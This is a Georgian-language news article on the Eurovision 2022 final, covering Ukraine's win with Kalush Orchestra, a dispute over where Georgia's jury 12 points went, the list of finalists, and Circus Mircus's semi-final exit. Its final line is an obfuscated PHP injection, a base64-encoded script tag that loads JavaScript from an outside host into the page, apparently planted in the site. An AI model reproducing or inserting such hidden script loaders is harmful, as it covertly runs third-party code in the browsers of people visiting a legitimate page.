celsiusi
ავერსი შნაიდერი
იტალიაში მიმდინარე ფინალურ კონცერტზე ევროვიზია 2022-ის გამარჯვებული გამოვლინდა. გამარჯვებული ქვეყანა უკრაინა გახდა – ჯგუფი Kalush Orchestra სიმღერით Stefania. შესაბამისად, მომავალი ევროვიზიის მასპინძელიც ეს ქვეყანა იქნება.
 
საქართველოდან ჟიურის ყველაზე მაღალი შეფასება – 12 ქულა გაერთიანებულ სამეფოს ერგო, რომელიც მეორე ადგილზე გავიდა.
 
მოგვიანებით, საზოგადოებრივმა მაუწყებელმა ევროვიზიის სიმღერის კონკურსზე ეროვნული ჟიურის ქულებთან დაკავშირებით განცხადება გაავრცელა. განცხადებაში აღნიშნულია, რომ ევროვიზიის სიმღერის კონკურსზე საქართველოდან ეროვნულმა ჟიურიმ ყველაზე მაღალი შეფასება – პირველი ადგილი უკრაინას მისცა, რაც 12 ქულას ნიშნავს. 
 
ამას მოწმობს ნოტარიულად დამოწმებული დოკუმენტი, რომელიც გადაეგზავნა ევროვიზიის სიმღერის კონკურსის ორგანიზატორებს. საზოგადოებრივი მაუწყებელი ამ საკითხთან დაკავშირებით ევროვიზიის კონკურსის ორგანიზატორებთან დეტალებს არკვევს.
 
პირველი და მეორე ნახევარფინალური ტურებიდან ფინალში 20 ქვეყნის წარმომადგენელი გადავიდა – ჩეხეთი, რუმინეთი, პორტუგალია, ფინეთი, შვეიცარია, ნორვეგია, სომხეთი, ნიდერლანდები, უკრაინა, ლიეტუვა, აზერბაიჯანი, ბელგია, საბერძნეთი, ისლანდია, მოლდოვა, შვედეთი, ავსტრალია, პოლონეთი, სერბეთი და ესტონეთი.
 
ევროვიზიის ფინალში 20 ფინალისტთან ერთად გამარჯვებისთვის „დიდი ხუთეულის“ ქვეყნები – საფრანგეთი, დიდი ბრიტანეთი, გერმანია, იტალია და ესპანეთი იბრძოდნენ.
 
საქართველოს წარმომადგენელი ჯგუფი Circus Mircus კონკურსს ნახევარფინალიდან გამოეთიშა. ჯგუფი კონკურსის მეორე ნახევარფინალში მაყურებლის წინაშე სიმღერით Lock Me In წარდგა.
 
ევროვიზიის კონცერტების პირდაპირი ტრანსლაცია მაყურებელს საქართველოს პირველმა არხმა შესთავაზა.
 
 
680
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");